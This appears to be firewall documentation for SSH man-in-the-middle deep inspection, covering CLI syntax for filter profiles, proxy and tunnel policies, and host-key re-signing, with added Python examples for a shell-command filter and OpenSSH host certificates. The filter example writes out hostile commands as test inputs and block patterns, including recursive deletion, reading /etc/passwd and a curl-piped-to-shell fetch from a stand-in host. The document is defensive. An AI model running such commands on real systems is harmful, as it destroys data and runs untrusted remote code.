SSH MITM deep inspection
As OpenSSH vulnerabilities continue to be disclosed, attacks carried inside SSH sessions need to be detected, which requires decrypting the SSH tunnel to inspect its contents. This feature introduces security controls for SSH Man-in-the-Middle (MITM) deep inspection, including:
- SSH filter profiles to control SSH tunnel types and filtering on SSH shell commands.
- SSH proxy policies to apply a proxy firewall policy, with user authentication, to SSH sessions.
- Support for SSH tunnel policy to perform access control for TCP/IP port forwarding traffic that is tunneled through the SSH proxy. IPS scanning can be applied to the tunneled traffic.
- Support for SSH trust to detect and prevent SSH MITM attacks.
Syntax
- Add SSH-related options to ssl-ssh-profile for proxy-mode profiles
- Add option to bypass or block unsupported SSH protocol (Deep scan only supports SSH 2.0)
config firewall ssl-ssh-profile
edit <name>
config ssh
set unsupported-version {bypass | block}
next
end
end
- Add option to enable SSH proxy policy check
config firewall ssl-ssh-profile
edit <name>
config ssh
set ssh-policy-check {enable | disable}
set ssh-tun-policy-check {enable | disable}
next
end
end
When ssh-policy-check is enabled, the proxy matches SSH traffic against "SSH proxy" policies; when ssh-tun-policy-check is enabled, TCP/IP port-forwarding traffic carried inside the session is matched against "SSH tunnel" policies.
- Move the block/log options for x11-filter/ssh-shell/exec/port-forward to the SSH filter profile
- SSH filter profile
- Support options to block or log x11-filter/ssh-shell/exec/port-forward/sftp
config ssh-filter profile
edit <name>
set block {x11-filter | ssh-shell | exec | port-forward | sftp}
set log {x11-filter | ssh-shell | exec | port-forward | sftp}
next
end
- Add Shell command filters
config ssh-filter profile
edit <name>
config shell-commands
edit <id>
set type {simple | regex}
set pattern <cmd-string>
set action {block | allow}
set log {enable | disable}
set alert {enable | disable}
set severity {low | medium | high | critical}
next
end
set default-command-log {enable | disable}
end
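The shell-command filter above is an ordered rule list, so the interesting behaviour is the interaction between rule order, the two pattern types, and default-command-log. The following Python is an added example, not FortiOS code: it models one ssh-filter profile and evaluates sample commands against it. The rules, severities and sample commands are constructed for illustration, and two points the page does not state are assumptions marked in the code: rules are tried in ascending id order with the first match winning, and "simple" means a plain substring match while "regex" is an unanchored regular-expression search.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ShellCommandRule:
    """One entry under 'config shell-commands' in an ssh-filter profile."""
    id: int
    type: str            # "simple" or "regex"
    pattern: str
    action: str          # "block" or "allow"
    log: bool = True
    alert: bool = False
    severity: str = "medium"

    def matches(self, cmd: str) -> bool:
        # Assumed semantics: "simple" is a case-sensitive substring match,
        # "regex" is an unanchored regular-expression search.
        if self.type == "simple":
            return self.pattern in cmd
        if self.type == "regex":
            return re.search(self.pattern, cmd) is not None
        raise ValueError(f"unknown shell-command type: {self.type!r}")


@dataclass
class Decision:
    action: str
    rule_id: Optional[int]   # None when no rule matched
    log: bool
    alert: bool
    severity: Optional[str]


@dataclass
class ShellCommandFilter:
    """ssh-filter profile: ordered shell-command rules plus default-command-log."""
    rules: List[ShellCommandRule]
    default_command_log: bool = False

    def evaluate(self, cmd: str) -> Decision:
        # Surrounding whitespace is stripped so a '^'-anchored regex still
        # matches a command typed with leading spaces.
        line = cmd.strip()
        for rule in sorted(self.rules, key=lambda r: r.id):   # assumed: first match wins
            if rule.matches(line):
                return Decision(rule.action, rule.id, rule.log, rule.alert, rule.severity)
        # No rule matched: allowed, and logged only when default-command-log is enabled.
        return Decision("allow", None, self.default_command_log, False, None)


def build_profile() -> ShellCommandFilter:
    """Constructed profile with hypothetical rules (not taken from the page)."""
    return ShellCommandFilter(
        rules=[
            ShellCommandRule(1, "regex", r"\brm\s+-[a-zA-Z]*[rR][a-zA-Z]*\s+/", "block",
                             log=True, alert=True, severity="critical"),
            ShellCommandRule(2, "simple", "| sh", "block",
                             log=True, alert=True, severity="high"),
            ShellCommandRule(3, "regex", r"^(ls|pwd|whoami)(\s|$)", "allow", log=False),
        ],
        default_command_log=True,
    )


def log_line(cmd: str, d: Decision) -> Optional[str]:
    """Render a syslog-style line, or None when the decision says not to log."""
    if not d.log:
        return None
    rule = f"rule={d.rule_id}" if d.rule_id is not None else "rule=default"
    sev = f" severity={d.severity}" if d.severity else ""
    alert = " alert=yes" if d.alert else ""
    return f"ssh-filter shell-command action={d.action} {rule}{sev}{alert} cmd={cmd.strip()!r}"


if __name__ == "__main__":
    prof = build_profile()
    for c in ["  rm -rf /var/log", "ls -la /tmp", "curl http://x/1.sh | sh", "cat /etc/passwd"]:
        print(log_line(c, prof.evaluate(c)))
```

A command-stream filter of this kind is a guardrail, not a boundary: quoting (`r""m -rf /`), aliases, and commands fetched at runtime all evade substring and regex patterns. Keep default-command-log enabled so unmatched commands are still recorded, and where a server only needs non-interactive access, block ssh-shell and allow-list exec instead.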
- Allow an SSH filter profile to be set in config firewall policy when UTM is enabled.
- Support SSH proxy policy for SSH sessions
- Add a proxy type ssh to config firewall proxy-policy
config firewall proxy-policy
edit <pol-id>
set proxy ssh
next
end
- When user/user-group is set in an SSH proxy policy, firewall authentication can be performed for SSH proxy traffic. An authentication rule for SSH is added:
config authentication rule
edit <name>
set protocol ssh
next
end
"Basic" authentication scheme:
config authentication scheme
edit "ssh-active"
set method basic
set user-database "local" #or LDAP server
next
end
"ssh-publickey" authentication scheme:
config authentication scheme
edit "ssh-pkey"
set method ssh-publickey
set user-database "local" #or LDAP server
set ssh-ca "server-ca"
next
end
The user name is taken from the SSH public-key certificate presented by the client. Group membership is looked up in the user database only after that certificate has been validated against the configured ssh-ca.
Both "Basic" and "ssh-publickey" authentication schemes:
config authentication scheme
edit "ssh-basic-pkey"
set method basic ssh-publickey
set user-database "local" #or LDAP server
set ssh-ca "server-ca"
next
end
- Support SSH tunnel policy to perform access control for TCP/IP port forwarding traffic.
- Add a proxy type ssh-tunnel to config firewall proxy-policy
config firewall proxy-policy
edit <pol-id>
set proxy ssh-tunnel
set action {accept | deny}
next
end
- Support allow or deny, and apply an IPS sensor or application control to the tunneled traffic.
- Support SSH trust to detect and prevent SSH MITM attacks
- Define trusted SSH hostkey for specific SSH server
config firewall ssh host-key
edit <name>
set status {trusted | revoked}
set type {RSA | DSS | ECDSA}
set nid <NID of ECDSA key>
set ip <ip>
set port <port>
set hostname <name>
set public-key <hostkey>
next
end
- Define trusted/untrusted CAs for host-key signing. Any host key signed by a trusted CA is trusted unless that host key is explicitly revoked.
config firewall ssh local-ca
edit <name>
set password <passwd>
set public-key <public key>
set private-key <private key>
set source {built-in | user}
next
end
The system creates two built-in SSH CAs, Fortinet_SSH_CA and Fortinet_SSH_CA_Untrusted. When the proxy intercepts a session it replaces the server's host key with a local host key and signs it with the trusted CA if the server's host key is trusted, or with the untrusted CA if it is not.
- Define local host-key templates for re-signing. By default they are generated automatically.
config firewall ssh local-key
edit <name>
set password <passwd>
set public-key <public key>
set private-key <private key>
set source {built-in | user}
next
end
The system creates local host keys of each type as default re-signing templates: Fortinet_SSH_RSA2048, Fortinet_SSH_DSA1024, Fortinet_SSH_ECDSA256, Fortinet_SSH_ECDSA384, Fortinet_SSH_ECDSA521, Fortinet_SSH_ED25519, Fortinet_SSH_RSA1024.
Administrators can load their own local host keys and select them for MITM re-signing in config firewall ssh setting.
- Per-VDOM SSH settings
config firewall ssh setting
set caname <trusted-ca>
set untrusted-caname <untrusted-ca>
set hostkey-rsa <hostkey-rsa>
set hostkey-dss <hostkey-dss>
set hostkey-ecdsa256 <hostkey-ecdsa256>
set hostkey-ecdsa384 <hostkey-ecdsa384>
set ed25519-key <ed25519-key>
set host-trusted-check {enable | disable}
end
When the server host key is trusted and CA-signed, the SSH proxy re-signs the matching type of local host key with the trusted CA.
When the server host key is trusted but not CA-signed, the SSH proxy presents the matching type of local host key as-is.
When the server host key is untrusted and CA-signed, the SSH proxy re-signs a temporary host key (one hour lifetime) with the untrusted CA.
When the server host key is untrusted and not CA-signed, the SSH proxy presents a temporary host key (one hour lifetime).
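In the two CA-signed cases above the client does not receive the server's original host key; it receives a local host key wrapped in an OpenSSH host certificate signed by Fortinet_SSH_CA or Fortinet_SSH_CA_Untrusted. The following Python is an added example, not FortiOS code, that encodes and parses that certificate format (the PROTOCOL.certkeys layout for ssh-ed25519-cert-v01@openssh.com), runs the checks an SSH client applies before accepting it (signing CA, principal, validity window), and emits the known_hosts line that tells OpenSSH to trust the re-signing CA. The key bytes and hostnames are constructed, and the certificate signature field is left empty rather than computed, so the blob is structurally valid but not cryptographically signed.

```python
import base64
import struct
import time
from typing import Dict, List, Tuple

CERT_ALGO = b"ssh-ed25519-cert-v01@openssh.com"
SSH2_CERT_TYPE_HOST = 2   # 1 = user certificate, 2 = host certificate


def ssh_string(b: bytes) -> bytes:
    """SSH wire 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def read_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4: off + 4 + n], off + 4 + n


def build_host_cert(host_pubkey: bytes, principals: List[str], ca_pubkey: bytes,
                    valid_after: int, valid_before: int, key_id: str = "resigned-host") -> bytes:
    """Encode an ed25519 host certificate body.

    Constructed example: the trailing signature is left empty instead of being
    computed with the CA private key, so the result is NOT cryptographically valid.
    """
    body = (ssh_string(CERT_ALGO)
            + ssh_string(b"\x00" * 32)                        # nonce (random in real certs)
            + ssh_string(host_pubkey)
            + struct.pack(">Q", 1)                            # serial
            + struct.pack(">I", SSH2_CERT_TYPE_HOST)
            + ssh_string(key_id.encode())
            + ssh_string(b"".join(ssh_string(p.encode()) for p in principals))
            + struct.pack(">Q", valid_after)
            + struct.pack(">Q", valid_before)
            + ssh_string(b"")                                 # critical options
            + ssh_string(b"")                                 # extensions
            + ssh_string(b"")                                 # reserved
            + ssh_string(ssh_string(b"ssh-ed25519") + ssh_string(ca_pubkey)))  # signature key
    return body + ssh_string(b"")                             # signature (omitted here)


def parse_host_cert(blob: bytes) -> Dict:
    off = 0
    algo, off = read_string(blob, off)
    _nonce, off = read_string(blob, off)
    host_pubkey, off = read_string(blob, off)
    serial, ctype = struct.unpack_from(">QI", blob, off); off += 12
    key_id, off = read_string(blob, off)
    plist, off = read_string(blob, off)
    principals, p = [], 0
    while p < len(plist):                                     # nested list of strings
        name, p = read_string(plist, p)
        principals.append(name.decode())
    valid_after, valid_before = struct.unpack_from(">QQ", blob, off); off += 16
    for _ in range(3):                                        # critical options, extensions, reserved
        _, off = read_string(blob, off)
    sigkey, off = read_string(blob, off)
    ca_type, q = read_string(sigkey, 0)
    ca_pubkey, _ = read_string(sigkey, q)
    return {"algo": algo.decode(), "host_pubkey": host_pubkey, "serial": serial,
            "type": ctype, "key_id": key_id.decode(), "principals": principals,
            "valid_after": valid_after, "valid_before": valid_before,
            "ca_type": ca_type.decode(), "ca_pubkey": ca_pubkey}


def check_host_cert(cert: Dict, hostname: str, trusted_cas: List[bytes], now: int) -> Tuple[bool, str]:
    """Client-side acceptance checks; signature verification itself is out of scope here."""
    if cert["type"] != SSH2_CERT_TYPE_HOST:
        return False, "not a host certificate"
    if cert["ca_pubkey"] not in trusted_cas:
        return False, "signing CA is not trusted"
    if hostname not in cert["principals"]:
        return False, f"{hostname} is not a listed principal"
    if not (cert["valid_after"] <= now < cert["valid_before"]):
        return False, "outside validity window"
    return True, "ok"


def known_hosts_ca_line(host_pattern: str, ca_pubkey: bytes) -> str:
    """known_hosts marker that makes OpenSSH accept host certificates signed by this CA."""
    blob = ssh_string(b"ssh-ed25519") + ssh_string(ca_pubkey)
    return f"@cert-authority {host_pattern} ssh-ed25519 {base64.b64encode(blob).decode()}"


if __name__ == "__main__":
    host_key, trusted_ca, untrusted_ca = bytes(range(32)), b"\x42" * 32, b"\x43" * 32  # constructed
    now = int(time.time())
    for ca in (trusted_ca, untrusted_ca):
        cert = parse_host_cert(build_host_cert(host_key, ["git.example.internal"], ca, now, now + 3600))
        print(cert["key_id"], cert["principals"], check_host_cert(cert, "git.example.internal", [trusted_ca], now))
    print(known_hosts_ca_line("*.example.internal", trusted_ca))
```

The practical consequence for a deployment: clients only accept the re-signed key silently if the trusted CA's public key is distributed to them as an @cert-authority entry; without it every proxied session looks like an unknown host key, and users quickly learn to accept such prompts, which defeats the untrusted-CA signal the proxy is trying to send.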